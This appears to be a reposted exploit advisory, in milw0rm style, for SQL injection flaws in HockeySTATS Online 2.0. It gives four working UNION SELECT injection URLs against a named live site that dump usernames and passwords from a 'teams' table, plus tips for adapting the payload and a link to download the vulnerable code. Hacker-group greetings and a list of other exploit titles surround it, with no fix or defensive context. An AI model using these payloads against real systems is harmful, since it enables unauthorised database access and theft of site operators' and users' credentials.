HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

所属分类：网络安全 / Exploit 阅读数： 174

收藏 0赞 0分享

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## Hockeystats Online V BASIC & ADVANCED ( index.php opt )
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f
##
## Email : SQL@Hotmail.it
##
## SYRiAN Arab HACkErS
########################
########################
##
## -[[: L!VE DEMO :]]-
##
## [[BASIC VERSION]] www.thehockeystop.com/hstatsbasic/?opt=viewpage&type=html&id=-00002' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0 from teams/*
## www.thehockeystop.com/hstatsbasic/index.php?opt=schedule&season=1&divid=-1' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL from teams/*
##
## [[ADVANCED VERSION]] www.thehockeystop.com/hockeystats/?opt=viewpage&type=html&id=-00002' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0 from teams/*
## www.thehockeystop.com/hockeystats/index.php?opt=schedule&season=1&divid=-1' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL from teams/*
########################
########################
-[[ NOTE ]]-
1 ) In the first exploite you you need set the real id ?opt=viewpage&type=html&id=-< real id >' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0 from teams/*
2 ) Download [[Basic version]] code from here ;D http://www.thehockeystop.com/site/downloads/HSO_basic/HockeySTATS_Basic.zip

#######################################################################################################
#######################################################################################################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-

:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
#######################################################################################################
#######################################################################################################

更多精彩内容其他人还在看

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

Maian Search

Maian Weblog

Maian Guestbook

Maian Recipe

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

网络赚钱

站长故事